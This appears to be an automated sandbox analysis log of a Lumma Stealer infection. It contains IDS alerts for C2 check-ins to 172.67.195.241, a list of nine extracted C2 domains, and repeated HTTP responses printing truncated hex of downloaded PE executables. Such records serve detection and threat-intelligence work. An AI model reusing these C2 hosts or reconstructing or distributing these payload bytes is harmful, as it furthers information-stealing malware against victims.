            Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49709 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49719 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49719 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49727 -> 172.67.195.241:443
            Source: Malware configuration extractor | URLs: rapeflowwj.lat
            Source: Malware configuration extractor | URLs: crosshuaht.lat
            Source: Malware configuration extractor | URLs: volcanoyev.click
            Source: Malware configuration extractor | URLs: energyaffai.lat
            Source: Malware configuration extractor | URLs: aspecteirs.lat
            Source: Malware configuration extractor | URLs: necklacebudi.lat
            Source: Malware configuration extractor | URLs: grannyejh.lat
            Source: Malware configuration extractor | URLs: sustainskelet.lat
            Source: Malware configuration extractor | URLs: discokeyus.lat
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 01:18:15 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sun, 22 Dec 2024 14:24:51 GMTETag: "ae00-629dca4a1509c"Accept-Ranges: bytesContent-Length: 44544Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 59 ad 84 94 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a4 00 00 00 08 00 00 00 00 00 00 fe c2 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ac c2 00 00 4f 00 00 00 00 e0 00 00 ec 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 90 c2 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 a3 00 00 00 20 00 00 00 a4 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ec 05 00 00 00 e0 00 00 00 06 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 c2 00 00 00 00 00 00 48 00 00 00 02 00 05 00 78 22 00 00 18 a0 00 00 03 00 02 00 07 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 53 00 00 00 01 00 00 11 28 0f 00 00 0a 72 01 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0a 28 0f 00 00 0a 72 33 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0b 73 12 00 00 0a 25 6f 13 00 00 0a 06 07 6f 14 00 00 0a 7e 01 00 00 04 6f 15 00 00 0a 0c 7e 02 00 00 04 08 28 03 00 00 06 2a 1e 02 28 16 00 00 0a 2a 00 13 30 06 00 df 00 00 00 02 00 00 11 28 0f 00 00 0a 72 0e 01 00 70 28 10 00 00 0a 6f 11 00 00 0a 28 10 00 00 0a 7e 03 00 00 04 28 05 00 00 06 0a 28 0f 00 00 0a 06 6f 11 00 00 0a 0b 73 17 00 00 0a 73 18 00 00 0a 0c 08 6f 19 00 00 0a 28 0f 00 00 0a 72 0b 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 6f 19 00 00 0a 28 0f 00 00 0a 72 2d 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 17 6f 1b 00 00 0a 08 17 8d 19 00 00 01 25 16 07 a2 6f 1c 00 00 0a 6f 1d 00 00 0a 28 0f 00 00 0a 72 57 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1e 00 00 0a 28 0f 00 00 0a 72 71 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1f 00 00 0a 14 18 8d 10 00
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 01:18:15 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sun, 22 Dec 2024 14:24:51 GMTETag: "ae00-629dca4a1509c"Accept-Ranges: bytesContent-Length: 44544Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 59 ad 84 94 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a4 00 00 00 08 00 00 00 00 00 00 fe c2 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ac c2 00 00 4f 00 00 00 00 e0 00 00 ec 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 90 c2 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 a3 00 00 00 20 00 00 00 a4 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ec 05 00 00 00 e0 00 00 00 06 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 c2 00 00 00 00 00 00 48 00 00 00 02 00 05 00 78 22 00 00 18 a0 00 00 03 00 02 00 07 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 53 00 00 00 01 00 00 11 28 0f 00 00 0a 72 01 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0a 28 0f 00 00 0a 72 33 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0b 73 12 00 00 0a 25 6f 13 00 00 0a 06 07 6f 14 00 00 0a 7e 01 00 00 04 6f 15 00 00 0a 0c 7e 02 00 00 04 08 28 03 00 00 06 2a 1e 02 28 16 00 00 0a 2a 00 13 30 06 00 df 00 00 00 02 00 00 11 28 0f 00 00 0a 72 0e 01 00 70 28 10 00 00 0a 6f 11 00 00 0a 28 10 00 00 0a 7e 03 00 00 04 28 05 00 00 06 0a 28 0f 00 00 0a 06 6f 11 00 00 0a 0b 73 17 00 00 0a 73 18 00 00 0a 0c 08 6f 19 00 00 0a 28 0f 00 00 0a 72 0b 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 6f 19 00 00 0a 28 0f 00 00 0a 72 2d 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 17 6f 1b 00 00 0a 08 17 8d 19 00 00 01 25 16 07 a2 6f 1c 00 00 0a 6f 1d 00 00 0a 28 0f 00 00 0a 72 57 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1e 00 00 0a 28 0f 00 00 0a 72 71 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1f 00 00 0a 14 18 8d 10 00
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 01:18:16 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sun, 22 Dec 2024 14:07:09 GMTETag: "49c00-629dc654be596"Accept-Ranges: bytesContent-Length: 302080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ac 00 00 00 00 00 00 50 88 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bf 1b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 88 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 1d 04 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 eb 03 00 00 10 00 00 00 ec 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 97 20 00 00 00 00 04 00 00 22 00 00 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 e1 00 00 00 30 04 00 00 50 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 88 38 00 00 00 20 05 00 00 3a 00 00 00 62 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 01:18:17 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sun, 22 Dec 2024 14:24:51 GMTETag: "ae00-629dca4a1509c"Accept-Ranges: bytesContent-Length: 44544Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 59 ad 84 94 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a4 00 00 00 08 00 00 00 00 00 00 fe c2 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ac c2 00 00 4f 00 00 00 00 e0 00 00 ec 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 90 c2 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 a3 00 00 00 20 00 00 00 a4 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ec 05 00 00 00 e0 00 00 00 06 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 c2 00 00 00 00 00 00 48 00 00 00 02 00 05 00 78 22 00 00 18 a0 00 00 03 00 02 00 07 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 53 00 00 00 01 00 00 11 28 0f 00 00 0a 72 01 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0a 28 0f 00 00 0a 72 33 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0b 73 12 00 00 0a 25 6f 13 00 00 0a 06 07 6f 14 00 00 0a 7e 01 00 00 04 6f 15 00 00 0a 0c 7e 02 00 00 04 08 28 03 00 00 06 2a 1e 02 28 16 00 00 0a 2a 00 13 30 06 00 df 00 00 00 02 00 00 11 28 0f 00 00 0a 72 0e 01 00 70 28 10 00 00 0a 6f 11 00 00 0a 28 10 00 00 0a 7e 03 00 00 04 28 05 00 00 06 0a 28 0f 00 00 0a 06 6f 11 00 00 0a 0b 73 17 00 00 0a 73 18 00 00 0a 0c 08 6f 19 00 00 0a 28 0f 00 00 0a 72 0b 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 6f 19 00 00 0a 28 0f 00 00 0a 72 2d 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 17 6f 1b 00 00 0a 08 17 8d 19 00 00 01 25 16 07 a2 6f 1c 00 00 0a 6f 1d 00 00 0a 28 0f 00 00 0a 72 57 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1e 00 00 0a 28 0f 00 00 0a 72 71 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1f 00 00 0a 14 18 8d 10 00
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 01:18:18 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sun, 22 Dec 2024 14:07:09 GMTETag: "49c00-629dc654be596"Accept-Ranges: bytesContent-Length: 302080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ac 00 00 00 00 00 00 50 88 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bf 1b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 88 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 1d 04 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 eb 03 00 00 10 00 00 00 ec 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 97 20 00 00 00 00 04 00 00 22 00 00 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 e1 00 00 00 30 04 00 00 50 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 88 38 00 00 00 20 05 00 00 3a 00 00 00 62 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 01:18:21 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sun, 22 Dec 2024 14:24:51 GMTETag: "ae00-629dca4a1509c"Accept-Ranges: bytesContent-Length: 44544Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 59 ad 84 94 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a4 00 00 00 08 00 00 00 00 00 00 fe c2 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ac c2 00 00 4f 00 00 00 00 e0 00 00 ec 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 90 c2 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 a3 00 00 00 20 00 00 00 a4 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ec 05 00 00 00 e0 00 00 00 06 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 c2 00 00 00 00 00 00 48 00 00 00 02 00 05 00 78 22 00 00 18 a0 00 00 03 00 02 00 07 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 53 00 00 00 01 00 00 11 28 0f 00 00 0a 72 01 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0a 28 0f 00 00 0a 72 33 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0b 73 12 00 00 0a 25 6f 13 00 00 0a 06 07 6f 14 00 00 0a 7e 01 00 00 04 6f 15 00 00 0a 0c 7e 02 00 00 04 08 28 03 00 00 06 2a 1e 02 28 16 00 00 0a 2a 00 13 30 06 00 df 00 00 00 02 00 00 11 28 0f 00 00 0a 72 0e 01 00 70 28 10 00 00 0a 6f 11 00 00 0a 28 10 00 00 0a 7e 03 00 00 04 28 05 00 00 06 0a 28 0f 00 00 0a 06 6f 11 00 00 0a 0b 73 17 00 00 0a 73 18 00 00 0a 0c 08 6f 19 00 00 0a 28 0f 00 00 0a 72 0b 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 6f 19 00 00 0a 28 0f 00 00 0a 72 2d 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 17 6f 1b 00 00 0a 08 17 8d 19 00 00 01 25 16 07 a2 6f 1c 00 00 0a 6f 1d 00 00 0a 28 0f 00 00 0a 72 57 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1e 00 00 0a 28 0f 00 00 0a 72 71 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1f 00 00 0a 14 18 8d 10 00
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 01:18:22 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sun, 22 Dec 2024 14:07:09 GMTETag: "49c00-629dc654be596"Accept-Ranges: bytesContent-Length: 302080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ac 00 00 00 00 00 00 50 88 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bf 1b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 88 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 1d 04 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 eb 03 00 00 10 00 00 00 ec 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 97 20 00 00 00 00 04 00 00 22 00 00 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 e1 00 00 00 30 04 00 00 50 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 88 38 00 00 00 20 05 00 00 3a 00 00 00 62 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
